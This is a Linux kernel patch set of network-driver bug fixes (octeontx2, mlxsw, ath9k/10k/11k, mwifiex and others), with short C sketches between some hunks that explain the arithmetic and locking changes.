++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
+@@ -70,7 +70,7 @@ static int otx2_pfc_txschq_alloc_one(struct otx2_nic *pfvf, u8 prio)
+ 	 * link config level. These rest of the scheduler can be
+ 	 * same as hw.txschq_list.
+ 	 */
+-	for (lvl = 0; lvl < pfvf->hw.txschq_link_cfg_lvl; lvl++)
++	for (lvl = 0; lvl <= pfvf->hw.txschq_link_cfg_lvl; lvl++)
+ 		req->schq[lvl] = 1;
+ 
+ 	rc = otx2_sync_mbox_msg(&pfvf->mbox);
+@@ -83,7 +83,7 @@ static int otx2_pfc_txschq_alloc_one(struct otx2_nic *pfvf, u8 prio)
+ 		return PTR_ERR(rsp);
+ 
+ 	/* Setup transmit scheduler list */
+-	for (lvl = 0; lvl < pfvf->hw.txschq_link_cfg_lvl; lvl++) {
++	for (lvl = 0; lvl <= pfvf->hw.txschq_link_cfg_lvl; lvl++) {
+ 		if (!rsp->schq[lvl])
+ 			return -ENOSPC;
+ 
+@@ -125,19 +125,12 @@ int otx2_pfc_txschq_alloc(struct otx2_nic *pfvf)
+ 
+ static int otx2_pfc_txschq_stop_one(struct otx2_nic *pfvf, u8 prio)
+ {
+-	struct nix_txsch_free_req *free_req;
++	int lvl;
+ 
+-	mutex_lock(&pfvf->mbox.lock);
+ 	/* free PFC TLx nodes */
+-	free_req = otx2_mbox_alloc_msg_nix_txsch_free(&pfvf->mbox);
+-	if (!free_req) {
+-		mutex_unlock(&pfvf->mbox.lock);
+-		return -ENOMEM;
+-	}
+-
+-	free_req->flags = TXSCHQ_FREE_ALL;
+-	otx2_sync_mbox_msg(&pfvf->mbox);
+-	mutex_unlock(&pfvf->mbox.lock);
++	for (lvl = 0; lvl <= pfvf->hw.txschq_link_cfg_lvl; lvl++)
++		otx2_txschq_free_one(pfvf, lvl,
++				     pfvf->pfc_schq_list[lvl][prio]);
+ 
+ 	pfvf->pfc_alloc_status[prio] = false;
+ 	return 0;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index c236dba80ff1a..17e546d0d7e55 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -791,10 +791,6 @@ static void otx2_process_pfaf_mbox_msg(struct otx2_nic *pf,
+ 	case MBOX_MSG_NIX_LF_ALLOC:
+ 		mbox_handler_nix_lf_alloc(pf, (struct nix_lf_alloc_rsp *)msg);
+ 		break;
+-	case MBOX_MSG_NIX_TXSCH_ALLOC:
+-		mbox_handler_nix_txsch_alloc(pf,
+-					     (struct nix_txsch_alloc_rsp *)msg);
+-		break;
+ 	case MBOX_MSG_NIX_BP_ENABLE:
+ 		mbox_handler_nix_bp_enable(pf, (struct nix_bp_cfg_rsp *)msg);
+ 		break;
+@@ -1517,8 +1513,7 @@ err_free_nix_queues:
+ 	otx2_free_cq_res(pf);
+ 	otx2_ctx_disable(mbox, NIX_AQ_CTYPE_RQ, false);
+ err_free_txsch:
+-	if (otx2_txschq_stop(pf))
+-		dev_err(pf->dev, "%s failed to stop TX schedulers\n", __func__);
++	otx2_txschq_stop(pf);
+ err_free_sq_ptrs:
+ 	otx2_sq_free_sqbs(pf);
+ err_free_rq_ptrs:
+@@ -1553,15 +1548,13 @@ static void otx2_free_hw_resources(struct otx2_nic *pf)
+ 	struct mbox *mbox = &pf->mbox;
+ 	struct otx2_cq_queue *cq;
+ 	struct msg_req *req;
+-	int qidx, err;
++	int qidx;
+ 
+ 	/* Ensure all SQE are processed */
+ 	otx2_sqb_flush(pf);
+ 
+ 	/* Stop transmission */
+-	err = otx2_txschq_stop(pf);
+-	if (err)
+-		dev_err(pf->dev, "RVUPF: Failed to stop/free TX schedulers\n");
++	otx2_txschq_stop(pf);
+ 
+ #ifdef CONFIG_DCB
+ 	if (pf->pfc_en)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 53366dbfbf27c..f8f0c01f62a14 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -70,10 +70,6 @@ static void otx2vf_process_vfaf_mbox_msg(struct otx2_nic *vf,
+ 	case MBOX_MSG_NIX_LF_ALLOC:
+ 		mbox_handler_nix_lf_alloc(vf, (struct nix_lf_alloc_rsp *)msg);
+ 		break;
+-	case MBOX_MSG_NIX_TXSCH_ALLOC:
+-		mbox_handler_nix_txsch_alloc(vf,
+-					     (struct nix_txsch_alloc_rsp *)msg);
+-		break;
+ 	case MBOX_MSG_NIX_BP_ENABLE:
+ 		mbox_handler_nix_bp_enable(vf, (struct nix_bp_cfg_rsp *)msg);
+ 		break;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+index d219f8417d93a..dec1492da74de 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+@@ -319,16 +319,11 @@ static int mlx5_pci_link_toggle(struct mlx5_core_dev *dev)
+ 		pci_cfg_access_lock(sdev);
+ 	}
+ 	/* PCI link toggle */
+-	err = pci_read_config_word(bridge, cap + PCI_EXP_LNKCTL, &reg16);
+-	if (err)
+-		return err;
+-	reg16 |= PCI_EXP_LNKCTL_LD;
+-	err = pci_write_config_word(bridge, cap + PCI_EXP_LNKCTL, reg16);
++	err = pcie_capability_set_word(bridge, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_LD);
+ 	if (err)
+ 		return err;
+ 	msleep(500);
+-	reg16 &= ~PCI_EXP_LNKCTL_LD;
+-	err = pci_write_config_word(bridge, cap + PCI_EXP_LNKCTL, reg16);
++	err = pcie_capability_clear_word(bridge, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_LD);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_hwmon.c b/drivers/net/ethernet/mellanox/mlxsw/core_hwmon.c
+index 70735068cf292..0fd290d776ffe 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_hwmon.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_hwmon.c
+@@ -405,7 +405,8 @@ mlxsw_hwmon_module_temp_label_show(struct device *dev,
+ 			container_of(attr, struct mlxsw_hwmon_attr, dev_attr);
+ 
+ 	return sprintf(buf, "front panel %03u\n",
+-		       mlxsw_hwmon_attr->type_index);
++		       mlxsw_hwmon_attr->type_index + 1 -
++		       mlxsw_hwmon_attr->mlxsw_hwmon_dev->sensor_count);
+ }
+ 
+ static ssize_t
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/i2c.c b/drivers/net/ethernet/mellanox/mlxsw/i2c.c
+index f5f5f8dc3d190..3beefc167da91 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/i2c.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/i2c.c
+@@ -48,6 +48,7 @@
+ #define MLXSW_I2C_MBOX_SIZE_BITS	12
+ #define MLXSW_I2C_ADDR_BUF_SIZE		4
+ #define MLXSW_I2C_BLK_DEF		32
++#define MLXSW_I2C_BLK_MAX		100
+ #define MLXSW_I2C_RETRY			5
+ #define MLXSW_I2C_TIMEOUT_MSECS		5000
+ #define MLXSW_I2C_MAX_DATA_SIZE		256
+@@ -444,7 +445,7 @@ mlxsw_i2c_cmd(struct device *dev, u16 opcode, u32 in_mod, size_t in_mbox_size,
+ 	} else {
+ 		/* No input mailbox is case of initialization query command. */
+ 		reg_size = MLXSW_I2C_MAX_DATA_SIZE;
+-		num = reg_size / mlxsw_i2c->block_size;
++		num = DIV_ROUND_UP(reg_size, mlxsw_i2c->block_size);
+ 
+ 		if (mutex_lock_interruptible(&mlxsw_i2c->cmd.lock) < 0) {
+ 			dev_err(&client->dev, "Could not acquire lock");
+@@ -653,7 +654,7 @@ static int mlxsw_i2c_probe(struct i2c_client *client,
+ 			return -EOPNOTSUPP;
+ 		}
+ 
+-		mlxsw_i2c->block_size = max_t(u16, MLXSW_I2C_BLK_DEF,
++		mlxsw_i2c->block_size = min_t(u16, MLXSW_I2C_BLK_MAX,
+ 					      min_t(u16, quirks->max_read_len,
+ 						    quirks->max_write_len));
+ 	} else {
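
Two things change in the mlxsw i2c hunks above: the block count uses DIV_ROUND_UP so the trailing partial block is not silently dropped, and the block size is clamped down to a maximum rather than raised to a minimum. A standalone sketch of the arithmetic (values illustrative):

#include <stdio.h>

#define DIV_ROUND_UP(n, d)	(((n) + (d) - 1) / (d))
#define MIN(a, b)		((a) < (b) ? (a) : (b))

int main(void)
{
	unsigned int reg_size = 256, block_size;
	unsigned int max_read = 100, max_write = 100, blk_max = 100;

	block_size = MIN(blk_max, MIN(max_read, max_write));

	/* 256 / 100 == 2 silently ignores the last 56 bytes */
	printf("truncating: %u blocks\n", reg_size / block_size);
	printf("rounded up: %u blocks\n", DIV_ROUND_UP(reg_size, block_size));
	return 0;
}
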
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index cabed1b7b45ed..a9a0dca0c0305 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -5201,13 +5201,9 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	/* Disable ASPM L1 as that cause random device stop working
+ 	 * problems as well as full system hangs for some PCIe devices users.
+-	 * Chips from RTL8168h partially have issues with L1.2, but seem
+-	 * to work fine with L1 and L1.1.
+ 	 */
+ 	if (rtl_aspm_is_safe(tp))
+ 		rc = 0;
+-	else if (tp->mac_version >= RTL_GIGA_MAC_VER_46)
+-		rc = pci_disable_link_state(pdev, PCIE_LINK_STATE_L1_2);
+ 	else
+ 		rc = pci_disable_link_state(pdev, PCIE_LINK_STATE_L1);
+ 	tp->aspm_manageable = !rc;
+diff --git a/drivers/net/ethernet/sfc/ptp.c b/drivers/net/ethernet/sfc/ptp.c
+index eaef4a15008a3..692c7f132e9f9 100644
+--- a/drivers/net/ethernet/sfc/ptp.c
++++ b/drivers/net/ethernet/sfc/ptp.c
+@@ -1387,7 +1387,8 @@ static int efx_ptp_insert_multicast_filters(struct efx_nic *efx)
+ 			goto fail;
+ 
+ 		rc = efx_ptp_insert_eth_filter(efx);
+-		if (rc < 0)
++		/* Not all firmware variants support this filter */
++		if (rc < 0 && rc != -EPROTONOSUPPORT)
+ 			goto fail;
+ 	}
+ 
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 6a7965ed63001..578f470e9fad9 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -1331,8 +1331,7 @@ static struct crypto_aead *macsec_alloc_tfm(char *key, int key_len, int icv_len)
+ 	struct crypto_aead *tfm;
+ 	int ret;
+ 
+-	/* Pick a sync gcm(aes) cipher to ensure order is preserved. */
+-	tfm = crypto_alloc_aead("gcm(aes)", 0, CRYPTO_ALG_ASYNC);
++	tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
+ 
+ 	if (IS_ERR(tfm))
+ 		return tfm;
+diff --git a/drivers/net/phy/sfp-bus.c b/drivers/net/phy/sfp-bus.c
+index daac293e8edec..1865e3dbdfad0 100644
+--- a/drivers/net/phy/sfp-bus.c
++++ b/drivers/net/phy/sfp-bus.c
+@@ -254,6 +254,16 @@ void sfp_parse_support(struct sfp_bus *bus, const struct sfp_eeprom_id *id,
+ 	switch (id->base.extended_cc) {
+ 	case SFF8024_ECC_UNSPEC:
+ 		break;
++	case SFF8024_ECC_100G_25GAUI_C2M_AOC:
++		if (br_min <= 28000 && br_max >= 25000) {
++			/* 25GBASE-R, possibly with FEC */
++			__set_bit(PHY_INTERFACE_MODE_25GBASER, interfaces);
++			/* There is currently no link mode for 25000base
++			 * with unspecified range, reuse SR.
++			 */
++			phylink_set(modes, 25000baseSR_Full);
++		}
++		break;
+ 	case SFF8024_ECC_100GBASE_SR4_25GBASE_SR:
+ 		phylink_set(modes, 100000baseSR4_Full);
+ 		phylink_set(modes, 25000baseSR_Full);
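
The sfp-bus hunk above accepts a 25G AOC module when its advertised bitrate window overlaps the range 25GBASE-R needs. A standalone sketch of that interval test (thresholds copied from the hunk, in Mbd):

#include <stdbool.h>
#include <stdio.h>

static bool supports_25gbase_r(unsigned int br_min, unsigned int br_max)
{
	/* module range [br_min, br_max] must overlap [25000, 28000] */
	return br_min <= 28000 && br_max >= 25000;
}

int main(void)
{
	printf("25781/25781: %d\n", supports_25gbase_r(25781, 25781));
	printf("10300/10300: %d\n", supports_25gbase_r(10300, 10300));
	return 0;
}
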
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 68829a5a93d3e..4fb981b8732ef 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1422,6 +1422,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x2c7c, 0x0191, 4)},	/* Quectel EG91 */
+ 	{QMI_QUIRK_SET_DTR(0x2c7c, 0x0195, 4)},	/* Quectel EG95 */
+ 	{QMI_FIXED_INTF(0x2c7c, 0x0296, 4)},	/* Quectel BG96 */
++	{QMI_QUIRK_SET_DTR(0x2c7c, 0x030e, 4)},	/* Quectel EM05GV2 */
+ 	{QMI_QUIRK_SET_DTR(0x2cb7, 0x0104, 4)},	/* Fibocom NL678 series */
+ 	{QMI_FIXED_INTF(0x0489, 0xe0b4, 0)},	/* Foxconn T77W968 LTE */
+ 	{QMI_FIXED_INTF(0x0489, 0xe0b5, 0)},	/* Foxconn T77W968 LTE with eSIM support*/
+diff --git a/drivers/net/wireless/ath/ath10k/pci.c b/drivers/net/wireless/ath/ath10k/pci.c
+index 728d607289c36..522691ba4c5d2 100644
+--- a/drivers/net/wireless/ath/ath10k/pci.c
++++ b/drivers/net/wireless/ath/ath10k/pci.c
+@@ -1963,8 +1963,9 @@ static int ath10k_pci_hif_start(struct ath10k *ar)
+ 	ath10k_pci_irq_enable(ar);
+ 	ath10k_pci_rx_post(ar);
+ 
+-	pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL,
+-				   ar_pci->link_ctl);
++	pcie_capability_clear_and_set_word(ar_pci->pdev, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_ASPMC,
++					   ar_pci->link_ctl & PCI_EXP_LNKCTL_ASPMC);
+ 
+ 	return 0;
+ }
+@@ -2821,8 +2822,8 @@ static int ath10k_pci_hif_power_up(struct ath10k *ar,
+ 
+ 	pcie_capability_read_word(ar_pci->pdev, PCI_EXP_LNKCTL,
+ 				  &ar_pci->link_ctl);
+-	pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL,
+-				   ar_pci->link_ctl & ~PCI_EXP_LNKCTL_ASPMC);
++	pcie_capability_clear_word(ar_pci->pdev, PCI_EXP_LNKCTL,
++				   PCI_EXP_LNKCTL_ASPMC);
+ 
+ 	/*
+ 	 * Bring the target up cleanly.
+diff --git a/drivers/net/wireless/ath/ath11k/pci.c b/drivers/net/wireless/ath/ath11k/pci.c
+index 3c6005ab9a717..3953ebd551bf8 100644
+--- a/drivers/net/wireless/ath/ath11k/pci.c
++++ b/drivers/net/wireless/ath/ath11k/pci.c
+@@ -582,8 +582,8 @@ static void ath11k_pci_aspm_disable(struct ath11k_pci *ab_pci)
+ 		   u16_get_bits(ab_pci->link_ctl, PCI_EXP_LNKCTL_ASPM_L1));
+ 
+ 	/* disable L0s and L1 */
+-	pcie_capability_write_word(ab_pci->pdev, PCI_EXP_LNKCTL,
+-				   ab_pci->link_ctl & ~PCI_EXP_LNKCTL_ASPMC);
++	pcie_capability_clear_word(ab_pci->pdev, PCI_EXP_LNKCTL,
++				   PCI_EXP_LNKCTL_ASPMC);
+ 
+ 	set_bit(ATH11K_PCI_ASPM_RESTORE, &ab_pci->flags);
+ }
+@@ -591,8 +591,10 @@ static void ath11k_pci_aspm_disable(struct ath11k_pci *ab_pci)
+ static void ath11k_pci_aspm_restore(struct ath11k_pci *ab_pci)
+ {
+ 	if (test_and_clear_bit(ATH11K_PCI_ASPM_RESTORE, &ab_pci->flags))
+-		pcie_capability_write_word(ab_pci->pdev, PCI_EXP_LNKCTL,
+-					   ab_pci->link_ctl);
++		pcie_capability_clear_and_set_word(ab_pci->pdev, PCI_EXP_LNKCTL,
++						   PCI_EXP_LNKCTL_ASPMC,
++						   ab_pci->link_ctl &
++						   PCI_EXP_LNKCTL_ASPMC);
+ }
+ 
+ static int ath11k_pci_power_up(struct ath11k_base *ab)
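
The ath10k/ath11k hunks above stop writing back an entire stale saved link-control word and instead clear-and-set only the ASPM field, so bits changed elsewhere in the meantime survive. A minimal userspace sketch of that read-modify-write (mask and register values are made up):

#include <stdio.h>
#include <stdint.h>

#define LNKCTL_ASPMC	0x0003	/* ASPM control field, illustrative */

static uint16_t lnkctl = 0x0143;	/* pretend current register value */

static void restore_aspm(uint16_t saved)
{
	/* clear the field, then set only the saved ASPM bits */
	lnkctl = (lnkctl & ~LNKCTL_ASPMC) | (saved & LNKCTL_ASPMC);
}

int main(void)
{
	uint16_t saved = 0x0042;	/* snapshot taken before ASPM was disabled */

	lnkctl &= ~LNKCTL_ASPMC;	/* the aspm_disable() step */
	restore_aspm(saved);
	printf("lnkctl=0x%04x\n", lnkctl);	/* 0x0142: only ASPM bits restored */
	return 0;
}
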
+diff --git a/drivers/net/wireless/ath/ath6kl/Makefile b/drivers/net/wireless/ath/ath6kl/Makefile
+index a75bfa9fd1cfd..dc2b3b46781e1 100644
+--- a/drivers/net/wireless/ath/ath6kl/Makefile
++++ b/drivers/net/wireless/ath/ath6kl/Makefile
+@@ -36,11 +36,6 @@ ath6kl_core-y += wmi.o
+ ath6kl_core-y += core.o
+ ath6kl_core-y += recovery.o
+ 
+-# FIXME: temporarily silence -Wdangling-pointer on non W=1+ builds
+-ifndef KBUILD_EXTRA_WARN
+-CFLAGS_htc_mbox.o += $(call cc-disable-warning, dangling-pointer)
+-endif
+-
+ ath6kl_core-$(CONFIG_NL80211_TESTMODE) += testmode.o
+ ath6kl_core-$(CONFIG_ATH6KL_TRACING) += trace.o
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_debug.c b/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
+index b3ed65e5c4da8..c55aab01fff5d 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
+@@ -491,7 +491,7 @@ int ath9k_htc_init_debug(struct ath_hw *ah)
+ 
+ 	priv->debug.debugfs_phy = debugfs_create_dir(KBUILD_MODNAME,
+ 					     priv->hw->wiphy->debugfsdir);
+-	if (!priv->debug.debugfs_phy)
++	if (IS_ERR(priv->debug.debugfs_phy))
+ 		return -ENOMEM;
+ 
+ 	ath9k_cmn_spectral_init_debug(&priv->spec_priv, priv->debug.debugfs_phy);
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index d652c647d56b5..1476b42b52a91 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -242,10 +242,10 @@ static void ath9k_wmi_ctrl_rx(void *priv, struct sk_buff *skb,
+ 		spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 		goto free_skb;
+ 	}
+-	spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 
+ 	/* WMI command response */
+ 	ath9k_wmi_rsp_callback(wmi, skb);
++	spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 
+ free_skb:
+ 	kfree_skb(skb);
+@@ -283,7 +283,8 @@ int ath9k_wmi_connect(struct htc_target *htc, struct wmi *wmi,
+ 
+ static int ath9k_wmi_cmd_issue(struct wmi *wmi,
+ 			       struct sk_buff *skb,
+-			       enum wmi_cmd_id cmd, u16 len)
++			       enum wmi_cmd_id cmd, u16 len,
++			       u8 *rsp_buf, u32 rsp_len)
+ {
+ 	struct wmi_cmd_hdr *hdr;
+ 	unsigned long flags;
+@@ -293,6 +294,11 @@ static int ath9k_wmi_cmd_issue(struct wmi *wmi,
+ 	hdr->seq_no = cpu_to_be16(++wmi->tx_seq_id);
+ 
+ 	spin_lock_irqsave(&wmi->wmi_lock, flags);
++
++	/* record the rsp buffer and length */
++	wmi->cmd_rsp_buf = rsp_buf;
++	wmi->cmd_rsp_len = rsp_len;
++
+ 	wmi->last_seq_id = wmi->tx_seq_id;
+ 	spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 
+@@ -308,8 +314,8 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 	struct ath_common *common = ath9k_hw_common(ah);
+ 	u16 headroom = sizeof(struct htc_frame_hdr) +
+ 		       sizeof(struct wmi_cmd_hdr);
++	unsigned long time_left, flags;
+ 	struct sk_buff *skb;
+-	unsigned long time_left;
+ 	int ret = 0;
+ 
+ 	if (ah->ah_flags & AH_UNPLUGGED)
+@@ -333,11 +339,7 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 		goto out;
+ 	}
+ 
+-	/* record the rsp buffer and length */
+-	wmi->cmd_rsp_buf = rsp_buf;
+-	wmi->cmd_rsp_len = rsp_len;
+-
+-	ret = ath9k_wmi_cmd_issue(wmi, skb, cmd_id, cmd_len);
++	ret = ath9k_wmi_cmd_issue(wmi, skb, cmd_id, cmd_len, rsp_buf, rsp_len);
+ 	if (ret)
+ 		goto out;
+ 
+@@ -345,7 +347,9 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 	if (!time_left) {
+ 		ath_dbg(common, WMI, "Timeout waiting for WMI command: %s\n",
+ 			wmi_cmd_to_name(cmd_id));
++		spin_lock_irqsave(&wmi->wmi_lock, flags);
+ 		wmi->last_seq_id = 0;
++		spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 		mutex_unlock(&wmi->op_mutex);
+ 		return -ETIMEDOUT;
+ 	}
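
The ath9k/wmi.c changes above widen wmi_lock so the sequence-number check, the response delivery, and the timeout reset all see consistent state. A standalone sketch of the same locking shape, with a pthread mutex standing in for the spinlock (all names illustrative):

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned int last_seq_id;
static char *rsp_buf;

static void rsp_callback(unsigned int seq)
{
	if (rsp_buf)
		printf("deliver rsp for seq %u\n", seq);
}

static void ctrl_rx(unsigned int seq)
{
	pthread_mutex_lock(&lock);
	if (seq != last_seq_id) {
		pthread_mutex_unlock(&lock);
		return;
	}
	rsp_callback(seq);	/* still under the lock, as in the fix */
	pthread_mutex_unlock(&lock);
}

static void cmd_timeout(void)
{
	pthread_mutex_lock(&lock);
	last_seq_id = 0;	/* reset now also done under the lock */
	rsp_buf = NULL;
	pthread_mutex_unlock(&lock);
}

int main(void)
{
	char buf[8];

	last_seq_id = 7;
	rsp_buf = buf;
	ctrl_rx(7);	/* delivered */
	cmd_timeout();
	ctrl_rx(7);	/* stale: rejected under the lock */
	return 0;
}
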
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fwil_types.h b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fwil_types.h
+index f518e025d6e46..a8d88aedc4227 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fwil_types.h
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fwil_types.h
+@@ -383,7 +383,12 @@ struct brcmf_scan_params_le {
+ 				 * fixed parameter portion is assumed, otherwise
+ 				 * ssid in the fixed portion is ignored
+ 				 */
+-	__le16 channel_list[1];	/* list of chanspecs */
++	union {
++		__le16 padding;	/* Reserve space for at least 1 entry for abort
++				 * which uses an on stack brcmf_scan_params_le
++				 */
++		DECLARE_FLEX_ARRAY(__le16, channel_list);	/* chanspecs */
++	};
+ };
+ 
+ struct brcmf_scan_results {
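
The brcmfmac hunk above replaces a one-element trailing array with a flexible array inside a union, keeping a padding member so an on-stack abort request still reserves room for one entry. A small portable C illustration of why the padding matters (layouts simplified; this is not the kernel's DECLARE_FLEX_ARRAY):

#include <stdio.h>
#include <stdint.h>

struct params_fixed {
	uint32_t flags;
	uint16_t channel_list[1];	/* old layout: one entry always present */
};

struct params_flex {
	uint32_t flags;
	uint16_t channel_list[];	/* new layout: sized by the caller */
};

int main(void)
{
	/* the flexible array adds nothing to sizeof, so without the
	 * union's padding member a stack instance would have no channel
	 * slot at all
	 */
	printf("fixed=%zu flex=%zu\n",
	       sizeof(struct params_fixed), sizeof(struct params_flex));
	return 0;
}
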
+diff --git a/drivers/net/wireless/marvell/mwifiex/debugfs.c b/drivers/net/wireless/marvell/mwifiex/debugfs.c
+index bda53cb91f376..63f232c723374 100644
+--- a/drivers/net/wireless/marvell/mwifiex/debugfs.c
++++ b/drivers/net/wireless/marvell/mwifiex/debugfs.c
+@@ -253,8 +253,11 @@ mwifiex_histogram_read(struct file *file, char __user *ubuf,
+ 	if (!p)
+ 		return -ENOMEM;
+ 
+-	if (!priv || !priv->hist_data)
+-		return -EFAULT;
++	if (!priv || !priv->hist_data) {
++		ret = -EFAULT;
++		goto free_and_exit;
++	}
++
+ 	phist_data = priv->hist_data;
+ 
+ 	p += sprintf(p, "\n"
+@@ -309,6 +312,8 @@ mwifiex_histogram_read(struct file *file, char __user *ubuf,
+ 	ret = simple_read_from_buffer(ubuf, count, ppos, (char *)page,
+ 				      (unsigned long)p - page);
+ 
++free_and_exit:
++	free_page(page);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/pcie.c b/drivers/net/wireless/marvell/mwifiex/pcie.c
+index 9a698a16a8f38..6697132ecc977 100644
+--- a/drivers/net/wireless/marvell/mwifiex/pcie.c
++++ b/drivers/net/wireless/marvell/mwifiex/pcie.c
+@@ -189,6 +189,8 @@ static int mwifiex_pcie_probe_of(struct device *dev)
+ }
+ 
+ static void mwifiex_pcie_work(struct work_struct *work);
++static int mwifiex_pcie_delete_rxbd_ring(struct mwifiex_adapter *adapter);
++static int mwifiex_pcie_delete_evtbd_ring(struct mwifiex_adapter *adapter);
+ 
+ static int
+ mwifiex_map_pci_memory(struct mwifiex_adapter *adapter, struct sk_buff *skb,
+@@ -792,14 +794,15 @@ static int mwifiex_init_rxq_ring(struct mwifiex_adapter *adapter)
+ 		if (!skb) {
+ 			mwifiex_dbg(adapter, ERROR,
+ 				    "Unable to allocate skb for RX ring.\n");
+-			kfree(card->rxbd_ring_vbase);
+ 			return -ENOMEM;
+ 		}
+ 
+ 		if (mwifiex_map_pci_memory(adapter, skb,
+ 					   MWIFIEX_RX_DATA_BUF_SIZE,
+-					   DMA_FROM_DEVICE))
+-			return -1;
++					   DMA_FROM_DEVICE)) {
++			kfree_skb(skb);
++			return -ENOMEM;
++		}
+ 
+ 		buf_pa = MWIFIEX_SKB_DMA_ADDR(skb);
+ 
+@@ -849,7 +852,6 @@ static int mwifiex_pcie_init_evt_ring(struct mwifiex_adapter *adapter)
+ 		if (!skb) {
+ 			mwifiex_dbg(adapter, ERROR,
+ 				    "Unable to allocate skb for EVENT buf.\n");
+-			kfree(card->evtbd_ring_vbase);
+ 			return -ENOMEM;
+ 		}
+ 		skb_put(skb, MAX_EVENT_SIZE);
+@@ -857,8 +859,7 @@ static int mwifiex_pcie_init_evt_ring(struct mwifiex_adapter *adapter)
+ 		if (mwifiex_map_pci_memory(adapter, skb, MAX_EVENT_SIZE,
+ 					   DMA_FROM_DEVICE)) {
+ 			kfree_skb(skb);
+-			kfree(card->evtbd_ring_vbase);
+-			return -1;
++			return -ENOMEM;
+ 		}
+ 
+ 		buf_pa = MWIFIEX_SKB_DMA_ADDR(skb);
+@@ -1058,6 +1059,7 @@ static int mwifiex_pcie_delete_txbd_ring(struct mwifiex_adapter *adapter)
+  */
+ static int mwifiex_pcie_create_rxbd_ring(struct mwifiex_adapter *adapter)
+ {
++	int ret;
+ 	struct pcie_service_card *card = adapter->card;
+ 	const struct mwifiex_pcie_card_reg *reg = card->pcie.reg;
+ 
+@@ -1096,7 +1098,10 @@ static int mwifiex_pcie_create_rxbd_ring(struct mwifiex_adapter *adapter)
+ 		    (u32)((u64)card->rxbd_ring_pbase >> 32),
+ 		    card->rxbd_ring_size);
+ 
+-	return mwifiex_init_rxq_ring(adapter);
++	ret = mwifiex_init_rxq_ring(adapter);
++	if (ret)
++		mwifiex_pcie_delete_rxbd_ring(adapter);
++	return ret;
+ }
+ 
+ /*
+@@ -1127,6 +1132,7 @@ static int mwifiex_pcie_delete_rxbd_ring(struct mwifiex_adapter *adapter)
+  */
+ static int mwifiex_pcie_create_evtbd_ring(struct mwifiex_adapter *adapter)
+ {
++	int ret;
+ 	struct pcie_service_card *card = adapter->card;
+ 	const struct mwifiex_pcie_card_reg *reg = card->pcie.reg;
+ 
+@@ -1161,7 +1167,10 @@ static int mwifiex_pcie_create_evtbd_ring(struct mwifiex_adapter *adapter)
+ 		    (u32)((u64)card->evtbd_ring_pbase >> 32),
+ 		    card->evtbd_ring_size);
+ 
+-	return mwifiex_pcie_init_evt_ring(adapter);
++	ret = mwifiex_pcie_init_evt_ring(adapter);
++	if (ret)
++		mwifiex_pcie_delete_evtbd_ring(adapter);
++	return ret;
+ }
+ 
+ /*
